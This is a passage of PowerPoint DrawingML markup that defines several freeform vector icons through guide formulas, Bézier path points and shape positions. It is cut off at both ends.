                <a:gd name="T24" fmla="*/ 96 w 199"/>
                <a:gd name="T25" fmla="*/ 1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98">
                  <a:moveTo>
                    <a:pt x="199" y="99"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="44"/>
                    <a:pt x="154" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="0"/>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="154"/>
                    <a:pt x="45" y="198"/>
                    <a:pt x="100" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="198"/>
                    <a:pt x="199" y="154"/>
                    <a:pt x="199" y="99"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="96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96" y="76"/>
                    <a:pt x="96" y="76"/>
                    <a:pt x="96" y="76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96" y="157"/>
                    <a:pt x="96" y="157"/>
                    <a:pt x="96" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96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6" name="Freeform 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFC6D19-3A85-4046-A043-CFF42AD2C2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9523279" y="6283862"/>
              <a:ext cx="657322" cy="658718"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 100 w 199"/>
                <a:gd name="T1" fmla="*/ 0 h 199"/>
                <a:gd name="T2" fmla="*/ 199 w 199"/>
                <a:gd name="T3" fmla="*/ 100 h 199"/>
                <a:gd name="T4" fmla="*/ 100 w 199"/>
                <a:gd name="T5" fmla="*/ 199 h 199"/>
                <a:gd name="T6" fmla="*/ 0 w 199"/>
                <a:gd name="T7" fmla="*/ 100 h 199"/>
                <a:gd name="T8" fmla="*/ 100 w 199"/>
                <a:gd name="T9" fmla="*/ 0 h 199"/>
                <a:gd name="T10" fmla="*/ 156 w 199"/>
                <a:gd name="T11" fmla="*/ 41 h 199"/>
                <a:gd name="T12" fmla="*/ 144 w 199"/>
                <a:gd name="T13" fmla="*/ 52 h 199"/>
                <a:gd name="T14" fmla="*/ 97 w 199"/>
                <a:gd name="T15" fmla="*/ 33 h 199"/>
                <a:gd name="T16" fmla="*/ 33 w 199"/>
                <a:gd name="T17" fmla="*/ 83 h 199"/>
                <a:gd name="T18" fmla="*/ 59 w 199"/>
                <a:gd name="T19" fmla="*/ 89 h 199"/>
                <a:gd name="T20" fmla="*/ 97 w 199"/>
                <a:gd name="T21" fmla="*/ 60 h 199"/>
                <a:gd name="T22" fmla="*/ 124 w 199"/>
                <a:gd name="T23" fmla="*/ 71 h 199"/>
                <a:gd name="T24" fmla="*/ 111 w 199"/>
                <a:gd name="T25" fmla="*/ 82 h 199"/>
                <a:gd name="T26" fmla="*/ 166 w 199"/>
                <a:gd name="T27" fmla="*/ 97 h 199"/>
                <a:gd name="T28" fmla="*/ 156 w 199"/>
                <a:gd name="T29" fmla="*/ 41 h 199"/>
                <a:gd name="T30" fmla="*/ 42 w 199"/>
                <a:gd name="T31" fmla="*/ 159 h 199"/>
                <a:gd name="T32" fmla="*/ 55 w 199"/>
                <a:gd name="T33" fmla="*/ 148 h 199"/>
                <a:gd name="T34" fmla="*/ 102 w 199"/>
                <a:gd name="T35" fmla="*/ 168 h 199"/>
                <a:gd name="T36" fmla="*/ 166 w 199"/>
                <a:gd name="T37" fmla="*/ 118 h 199"/>
                <a:gd name="T38" fmla="*/ 140 w 199"/>
                <a:gd name="T39" fmla="*/ 111 h 199"/>
                <a:gd name="T40" fmla="*/ 101 w 199"/>
                <a:gd name="T41" fmla="*/ 140 h 199"/>
                <a:gd name="T42" fmla="*/ 74 w 199"/>
                <a:gd name="T43" fmla="*/ 129 h 199"/>
                <a:gd name="T44" fmla="*/ 87 w 199"/>
                <a:gd name="T45" fmla="*/ 118 h 199"/>
                <a:gd name="T46" fmla="*/ 32 w 199"/>
                <a:gd name="T47" fmla="*/ 103 h 199"/>
                <a:gd name="T48" fmla="*/ 42 w 199"/>
                <a:gd name="T49" fmla="*/ 15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154" y="0"/>
                    <a:pt x="199" y="45"/>
                    <a:pt x="199" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="154"/>
                    <a:pt x="154" y="199"/>
                    <a:pt x="100" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="199"/>
                    <a:pt x="0" y="154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lose/>
                  <a:moveTo>
                    <a:pt x="156" y="41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32" y="41"/>
                    <a:pt x="114" y="33"/>
                    <a:pt x="97" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="40" y="54"/>
                    <a:pt x="33" y="83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63" y="72"/>
                    <a:pt x="79" y="60"/>
                    <a:pt x="97" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="60"/>
                    <a:pt x="117" y="65"/>
                    <a:pt x="124" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="82"/>
                    <a:pt x="111" y="82"/>
                    <a:pt x="111" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="97"/>
                    <a:pt x="166" y="97"/>
                    <a:pt x="166" y="97"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="41"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="42" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="148"/>
                    <a:pt x="55" y="148"/>
                    <a:pt x="55" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="159"/>
                    <a:pt x="84" y="168"/>
                    <a:pt x="102" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="168"/>
                    <a:pt x="159" y="146"/>
                    <a:pt x="166" y="118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5" y="128"/>
                    <a:pt x="120" y="140"/>
                    <a:pt x="101" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="140"/>
                    <a:pt x="81" y="135"/>
                    <a:pt x="74" y="129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32" y="103"/>
                    <a:pt x="32" y="103"/>
                    <a:pt x="32" y="103"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42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7" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B010FC-A7FB-4110-BE92-42A0EB8EF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1492555" y="784424"/>
              <a:ext cx="742950" cy="744538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 198"/>
                <a:gd name="T1" fmla="*/ 0 h 198"/>
                <a:gd name="T2" fmla="*/ 0 w 198"/>
                <a:gd name="T3" fmla="*/ 99 h 198"/>
                <a:gd name="T4" fmla="*/ 99 w 198"/>
                <a:gd name="T5" fmla="*/ 198 h 198"/>
                <a:gd name="T6" fmla="*/ 198 w 198"/>
                <a:gd name="T7" fmla="*/ 99 h 198"/>
                <a:gd name="T8" fmla="*/ 99 w 198"/>
                <a:gd name="T9" fmla="*/ 0 h 198"/>
                <a:gd name="T10" fmla="*/ 151 w 198"/>
                <a:gd name="T11" fmla="*/ 159 h 198"/>
                <a:gd name="T12" fmla="*/ 146 w 198"/>
                <a:gd name="T13" fmla="*/ 164 h 198"/>
                <a:gd name="T14" fmla="*/ 54 w 198"/>
                <a:gd name="T15" fmla="*/ 164 h 198"/>
                <a:gd name="T16" fmla="*/ 49 w 198"/>
                <a:gd name="T17" fmla="*/ 159 h 198"/>
                <a:gd name="T18" fmla="*/ 49 w 198"/>
                <a:gd name="T19" fmla="*/ 149 h 198"/>
                <a:gd name="T20" fmla="*/ 54 w 198"/>
                <a:gd name="T21" fmla="*/ 144 h 198"/>
                <a:gd name="T22" fmla="*/ 146 w 198"/>
                <a:gd name="T23" fmla="*/ 144 h 198"/>
                <a:gd name="T24" fmla="*/ 151 w 198"/>
                <a:gd name="T25" fmla="*/ 149 h 198"/>
                <a:gd name="T26" fmla="*/ 151 w 198"/>
                <a:gd name="T27" fmla="*/ 159 h 198"/>
                <a:gd name="T28" fmla="*/ 100 w 198"/>
                <a:gd name="T29" fmla="*/ 134 h 198"/>
                <a:gd name="T30" fmla="*/ 48 w 198"/>
                <a:gd name="T31" fmla="*/ 76 h 198"/>
                <a:gd name="T32" fmla="*/ 75 w 198"/>
                <a:gd name="T33" fmla="*/ 76 h 198"/>
                <a:gd name="T34" fmla="*/ 75 w 198"/>
                <a:gd name="T35" fmla="*/ 28 h 198"/>
                <a:gd name="T36" fmla="*/ 123 w 198"/>
                <a:gd name="T37" fmla="*/ 28 h 198"/>
                <a:gd name="T38" fmla="*/ 123 w 198"/>
                <a:gd name="T39" fmla="*/ 76 h 198"/>
                <a:gd name="T40" fmla="*/ 152 w 198"/>
                <a:gd name="T41" fmla="*/ 76 h 198"/>
                <a:gd name="T42" fmla="*/ 100 w 198"/>
                <a:gd name="T43" fmla="*/ 134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198">
                  <a:moveTo>
                    <a:pt x="99" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="0"/>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="154"/>
                    <a:pt x="44" y="198"/>
                    <a:pt x="99" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="198"/>
                    <a:pt x="198" y="154"/>
                    <a:pt x="198" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="44"/>
                    <a:pt x="154" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="162"/>
                    <a:pt x="149" y="164"/>
                    <a:pt x="146" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="164"/>
                    <a:pt x="54" y="164"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="164"/>
                    <a:pt x="49" y="162"/>
                    <a:pt x="49" y="15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49" y="146"/>
                    <a:pt x="51" y="144"/>
                    <a:pt x="54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9" y="144"/>
                    <a:pt x="151" y="146"/>
                    <a:pt x="151" y="149"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="159"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="76"/>
                    <a:pt x="48" y="76"/>
                    <a:pt x="48" y="76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76"/>
                    <a:pt x="123" y="76"/>
                    <a:pt x="123" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="76"/>
                    <a:pt x="152" y="76"/>
                    <a:pt x="152" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="1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8" name="Freeform 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4FEA96-B8CA-4593-8578-3BB173B395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321078" flipH="1" flipV="1">
              <a:off x="5721577" y="6018517"/>
              <a:ext cx="750888" cy="744538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 179 w 200"/>
                <a:gd name="T1" fmla="*/ 160 h 198"/>
                <a:gd name="T2" fmla="*/ 181 w 200"/>
                <a:gd name="T3" fmla="*/ 198 h 198"/>
                <a:gd name="T4" fmla="*/ 147 w 200"/>
                <a:gd name="T5" fmla="*/ 174 h 198"/>
                <a:gd name="T6" fmla="*/ 140 w 200"/>
                <a:gd name="T7" fmla="*/ 175 h 198"/>
                <a:gd name="T8" fmla="*/ 81 w 200"/>
                <a:gd name="T9" fmla="*/ 115 h 198"/>
                <a:gd name="T10" fmla="*/ 140 w 200"/>
                <a:gd name="T11" fmla="*/ 55 h 198"/>
                <a:gd name="T12" fmla="*/ 200 w 200"/>
                <a:gd name="T13" fmla="*/ 115 h 198"/>
                <a:gd name="T14" fmla="*/ 179 w 200"/>
                <a:gd name="T15" fmla="*/ 160 h 198"/>
                <a:gd name="T16" fmla="*/ 140 w 200"/>
                <a:gd name="T17" fmla="*/ 70 h 198"/>
                <a:gd name="T18" fmla="*/ 96 w 200"/>
                <a:gd name="T19" fmla="*/ 114 h 198"/>
                <a:gd name="T20" fmla="*/ 140 w 200"/>
                <a:gd name="T21" fmla="*/ 158 h 198"/>
                <a:gd name="T22" fmla="*/ 146 w 200"/>
                <a:gd name="T23" fmla="*/ 158 h 198"/>
                <a:gd name="T24" fmla="*/ 168 w 200"/>
                <a:gd name="T25" fmla="*/ 173 h 198"/>
                <a:gd name="T26" fmla="*/ 169 w 200"/>
                <a:gd name="T27" fmla="*/ 147 h 198"/>
                <a:gd name="T28" fmla="*/ 184 w 200"/>
                <a:gd name="T29" fmla="*/ 114 h 198"/>
                <a:gd name="T30" fmla="*/ 140 w 200"/>
                <a:gd name="T31" fmla="*/ 70 h 198"/>
                <a:gd name="T32" fmla="*/ 69 w 200"/>
                <a:gd name="T33" fmla="*/ 119 h 198"/>
                <a:gd name="T34" fmla="*/ 79 w 200"/>
                <a:gd name="T35" fmla="*/ 157 h 198"/>
                <a:gd name="T36" fmla="*/ 79 w 200"/>
                <a:gd name="T37" fmla="*/ 157 h 198"/>
                <a:gd name="T38" fmla="*/ 69 w 200"/>
                <a:gd name="T39" fmla="*/ 156 h 198"/>
                <a:gd name="T40" fmla="*/ 24 w 200"/>
                <a:gd name="T41" fmla="*/ 187 h 198"/>
                <a:gd name="T42" fmla="*/ 27 w 200"/>
                <a:gd name="T43" fmla="*/ 138 h 198"/>
                <a:gd name="T44" fmla="*/ 0 w 200"/>
                <a:gd name="T45" fmla="*/ 78 h 198"/>
                <a:gd name="T46" fmla="*/ 79 w 200"/>
                <a:gd name="T47" fmla="*/ 0 h 198"/>
                <a:gd name="T48" fmla="*/ 150 w 200"/>
                <a:gd name="T49" fmla="*/ 46 h 198"/>
                <a:gd name="T50" fmla="*/ 142 w 200"/>
                <a:gd name="T51" fmla="*/ 45 h 198"/>
                <a:gd name="T52" fmla="*/ 69 w 200"/>
                <a:gd name="T53" fmla="*/ 11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0" h="198">
                  <a:moveTo>
                    <a:pt x="179" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="198"/>
                    <a:pt x="181" y="198"/>
                    <a:pt x="181" y="198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5" y="174"/>
                    <a:pt x="143" y="175"/>
                    <a:pt x="140" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="175"/>
                    <a:pt x="81" y="148"/>
                    <a:pt x="81" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="82"/>
                    <a:pt x="107" y="55"/>
                    <a:pt x="140" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="55"/>
                    <a:pt x="200" y="82"/>
                    <a:pt x="200" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="133"/>
                    <a:pt x="192" y="149"/>
                    <a:pt x="179" y="160"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="140" y="70"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="70"/>
                    <a:pt x="96" y="90"/>
                    <a:pt x="96" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="138"/>
                    <a:pt x="116" y="158"/>
                    <a:pt x="140" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="158"/>
                    <a:pt x="144" y="158"/>
                    <a:pt x="146" y="158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47"/>
                    <a:pt x="169" y="147"/>
                    <a:pt x="169" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="139"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="90"/>
                    <a:pt x="164" y="70"/>
                    <a:pt x="140" y="70"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="69" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="133"/>
                    <a:pt x="72" y="146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5" y="157"/>
                    <a:pt x="72" y="156"/>
                    <a:pt x="69" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="187"/>
                    <a:pt x="24" y="187"/>
                    <a:pt x="24" y="187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1" y="123"/>
                    <a:pt x="0" y="102"/>
                    <a:pt x="0" y="78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110" y="0"/>
                    <a:pt x="138" y="19"/>
                    <a:pt x="150" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="45"/>
                    <a:pt x="145" y="45"/>
                    <a:pt x="142" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="45"/>
                    <a:pt x="69" y="78"/>
                    <a:pt x="69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99" name="Freeform 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DC10F1-EE67-4D1B-A165-63F269F071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402556" flipH="1" flipV="1">
              <a:off x="2052362" y="5640706"/>
              <a:ext cx="741363" cy="722313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 197"/>
                <a:gd name="T1" fmla="*/ 191 h 192"/>
                <a:gd name="T2" fmla="*/ 99 w 197"/>
                <a:gd name="T3" fmla="*/ 192 h 192"/>
                <a:gd name="T4" fmla="*/ 99 w 197"/>
                <a:gd name="T5" fmla="*/ 191 h 192"/>
                <a:gd name="T6" fmla="*/ 99 w 197"/>
                <a:gd name="T7" fmla="*/ 192 h 192"/>
                <a:gd name="T8" fmla="*/ 99 w 197"/>
                <a:gd name="T9" fmla="*/ 191 h 192"/>
                <a:gd name="T10" fmla="*/ 3 w 197"/>
                <a:gd name="T11" fmla="*/ 64 h 192"/>
                <a:gd name="T12" fmla="*/ 3 w 197"/>
                <a:gd name="T13" fmla="*/ 55 h 192"/>
                <a:gd name="T14" fmla="*/ 51 w 197"/>
                <a:gd name="T15" fmla="*/ 10 h 192"/>
                <a:gd name="T16" fmla="*/ 99 w 197"/>
                <a:gd name="T17" fmla="*/ 49 h 192"/>
                <a:gd name="T18" fmla="*/ 146 w 197"/>
                <a:gd name="T19" fmla="*/ 10 h 192"/>
                <a:gd name="T20" fmla="*/ 194 w 197"/>
                <a:gd name="T21" fmla="*/ 55 h 192"/>
                <a:gd name="T22" fmla="*/ 194 w 197"/>
                <a:gd name="T23" fmla="*/ 64 h 192"/>
                <a:gd name="T24" fmla="*/ 99 w 197"/>
                <a:gd name="T25" fmla="*/ 191 h 192"/>
                <a:gd name="T26" fmla="*/ 27 w 197"/>
                <a:gd name="T27" fmla="*/ 32 h 192"/>
                <a:gd name="T28" fmla="*/ 37 w 197"/>
                <a:gd name="T29" fmla="*/ 108 h 192"/>
                <a:gd name="T30" fmla="*/ 81 w 197"/>
                <a:gd name="T31" fmla="*/ 44 h 192"/>
                <a:gd name="T32" fmla="*/ 27 w 197"/>
                <a:gd name="T33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7" h="192">
                  <a:moveTo>
                    <a:pt x="99" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="191"/>
                    <a:pt x="99" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="192"/>
                    <a:pt x="99" y="192"/>
                    <a:pt x="99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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="127"/>
                    <a:pt x="3" y="64"/>
                    <a:pt x="3" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="64"/>
                    <a:pt x="3" y="62"/>
                    <a:pt x="3" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="30"/>
                    <a:pt x="25" y="10"/>
                    <a:pt x="51" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="10"/>
                    <a:pt x="99" y="49"/>
                    <a:pt x="99" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="49"/>
                    <a:pt x="103" y="10"/>
                    <a:pt x="146" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="10"/>
                    <a:pt x="194" y="30"/>
                    <a:pt x="194" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="62"/>
                    <a:pt x="194" y="64"/>
                    <a:pt x="194" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="64"/>
                    <a:pt x="197" y="127"/>
                    <a:pt x="99" y="191"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="27" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66"/>
                    <a:pt x="39" y="112"/>
                    <a:pt x="37" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="81" y="44"/>
                    <a:pt x="81" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="44"/>
                    <a:pt x="59" y="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0" name="Freeform 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2328DF-64C8-454D-B090-9B44298DE5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10433292" y="6078963"/>
              <a:ext cx="899679" cy="863617"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 200"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 44 w 200"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 40 w 200"/>
                <a:gd name="T5" fmla="*/ 0 h 192"/>
                <a:gd name="T6" fmla="*/ 32 w 200"/>
                <a:gd name="T7" fmla="*/ 0 h 192"/>
                <a:gd name="T8" fmla="*/ 32 w 200"/>
                <a:gd name="T9" fmla="*/ 36 h 192"/>
                <a:gd name="T10" fmla="*/ 0 w 200"/>
                <a:gd name="T11" fmla="*/ 36 h 192"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 48 h 192"/>
                <a:gd name="T14" fmla="*/ 0 w 200"/>
                <a:gd name="T15" fmla="*/ 152 h 192"/>
                <a:gd name="T16" fmla="*/ 40 w 200"/>
                <a:gd name="T17" fmla="*/ 192 h 192"/>
                <a:gd name="T18" fmla="*/ 64 w 200"/>
                <a:gd name="T19" fmla="*/ 192 h 192"/>
                <a:gd name="T20" fmla="*/ 136 w 200"/>
                <a:gd name="T21" fmla="*/ 192 h 192"/>
                <a:gd name="T22" fmla="*/ 160 w 200"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 200 w 200"/>
                <a:gd name="T25" fmla="*/ 152 h 192"/>
                <a:gd name="T26" fmla="*/ 200 w 200"/>
                <a:gd name="T27" fmla="*/ 12 h 192"/>
                <a:gd name="T28" fmla="*/ 200 w 200"/>
                <a:gd name="T29" fmla="*/ 0 h 192"/>
                <a:gd name="T30" fmla="*/ 188 w 200"/>
                <a:gd name="T31" fmla="*/ 0 h 192"/>
                <a:gd name="T32" fmla="*/ 32 w 200"/>
                <a:gd name="T33" fmla="*/ 140 h 192"/>
                <a:gd name="T34" fmla="*/ 22 w 200"/>
                <a:gd name="T35" fmla="*/ 166 h 192"/>
                <a:gd name="T36" fmla="*/ 12 w 200"/>
                <a:gd name="T37" fmla="*/ 140 h 192"/>
                <a:gd name="T38" fmla="*/ 12 w 200"/>
                <a:gd name="T39" fmla="*/ 48 h 192"/>
                <a:gd name="T40" fmla="*/ 32 w 200"/>
                <a:gd name="T41" fmla="*/ 48 h 192"/>
                <a:gd name="T42" fmla="*/ 32 w 200"/>
                <a:gd name="T43" fmla="*/ 140 h 192"/>
                <a:gd name="T44" fmla="*/ 188 w 200"/>
                <a:gd name="T45" fmla="*/ 140 h 192"/>
                <a:gd name="T46" fmla="*/ 148 w 200"/>
                <a:gd name="T47" fmla="*/ 180 h 192"/>
                <a:gd name="T48" fmla="*/ 136 w 200"/>
                <a:gd name="T49" fmla="*/ 180 h 192"/>
                <a:gd name="T50" fmla="*/ 64 w 200"/>
                <a:gd name="T51" fmla="*/ 180 h 192"/>
                <a:gd name="T52" fmla="*/ 52 w 200"/>
                <a:gd name="T53" fmla="*/ 180 h 192"/>
                <a:gd name="T54" fmla="*/ 35 w 200"/>
                <a:gd name="T55" fmla="*/ 176 h 192"/>
                <a:gd name="T56" fmla="*/ 44 w 200"/>
                <a:gd name="T57" fmla="*/ 152 h 192"/>
                <a:gd name="T58" fmla="*/ 44 w 200"/>
                <a:gd name="T59" fmla="*/ 12 h 192"/>
                <a:gd name="T60" fmla="*/ 188 w 200"/>
                <a:gd name="T61" fmla="*/ 12 h 192"/>
                <a:gd name="T62" fmla="*/ 188 w 200"/>
                <a:gd name="T63" fmla="*/ 140 h 192"/>
                <a:gd name="T64" fmla="*/ 100 w 200"/>
                <a:gd name="T65" fmla="*/ 128 h 192"/>
                <a:gd name="T66" fmla="*/ 60 w 200"/>
                <a:gd name="T67" fmla="*/ 128 h 192"/>
                <a:gd name="T68" fmla="*/ 60 w 200"/>
                <a:gd name="T69" fmla="*/ 140 h 192"/>
                <a:gd name="T70" fmla="*/ 100 w 200"/>
                <a:gd name="T71" fmla="*/ 140 h 192"/>
                <a:gd name="T72" fmla="*/ 100 w 200"/>
                <a:gd name="T73" fmla="*/ 128 h 192"/>
                <a:gd name="T74" fmla="*/ 100 w 200"/>
                <a:gd name="T75" fmla="*/ 108 h 192"/>
                <a:gd name="T76" fmla="*/ 60 w 200"/>
                <a:gd name="T77" fmla="*/ 108 h 192"/>
                <a:gd name="T78" fmla="*/ 60 w 200"/>
                <a:gd name="T79" fmla="*/ 120 h 192"/>
                <a:gd name="T80" fmla="*/ 100 w 200"/>
                <a:gd name="T81" fmla="*/ 120 h 192"/>
                <a:gd name="T82" fmla="*/ 100 w 200"/>
                <a:gd name="T83" fmla="*/ 108 h 192"/>
                <a:gd name="T84" fmla="*/ 100 w 200"/>
                <a:gd name="T85" fmla="*/ 88 h 192"/>
                <a:gd name="T86" fmla="*/ 60 w 200"/>
                <a:gd name="T87" fmla="*/ 88 h 192"/>
                <a:gd name="T88" fmla="*/ 60 w 200"/>
                <a:gd name="T89" fmla="*/ 100 h 192"/>
                <a:gd name="T90" fmla="*/ 100 w 200"/>
                <a:gd name="T91" fmla="*/ 100 h 192"/>
                <a:gd name="T92" fmla="*/ 100 w 200"/>
                <a:gd name="T93" fmla="*/ 88 h 192"/>
                <a:gd name="T94" fmla="*/ 168 w 200"/>
                <a:gd name="T95" fmla="*/ 36 h 192"/>
                <a:gd name="T96" fmla="*/ 60 w 200"/>
                <a:gd name="T97" fmla="*/ 36 h 192"/>
                <a:gd name="T98" fmla="*/ 60 w 200"/>
                <a:gd name="T99" fmla="*/ 52 h 192"/>
                <a:gd name="T100" fmla="*/ 168 w 200"/>
                <a:gd name="T101" fmla="*/ 52 h 192"/>
                <a:gd name="T102" fmla="*/ 168 w 200"/>
                <a:gd name="T103" fmla="*/ 36 h 192"/>
                <a:gd name="T104" fmla="*/ 100 w 200"/>
                <a:gd name="T105" fmla="*/ 68 h 192"/>
                <a:gd name="T106" fmla="*/ 60 w 200"/>
                <a:gd name="T107" fmla="*/ 68 h 192"/>
                <a:gd name="T108" fmla="*/ 60 w 200"/>
                <a:gd name="T109" fmla="*/ 80 h 192"/>
                <a:gd name="T110" fmla="*/ 100 w 200"/>
                <a:gd name="T111" fmla="*/ 80 h 192"/>
                <a:gd name="T112" fmla="*/ 100 w 200"/>
                <a:gd name="T113" fmla="*/ 68 h 192"/>
                <a:gd name="T114" fmla="*/ 112 w 200"/>
                <a:gd name="T115" fmla="*/ 140 h 192"/>
                <a:gd name="T116" fmla="*/ 168 w 200"/>
                <a:gd name="T117" fmla="*/ 140 h 192"/>
                <a:gd name="T118" fmla="*/ 168 w 200"/>
                <a:gd name="T119" fmla="*/ 68 h 192"/>
                <a:gd name="T120" fmla="*/ 112 w 200"/>
                <a:gd name="T121" fmla="*/ 68 h 192"/>
                <a:gd name="T122" fmla="*/ 112 w 200"/>
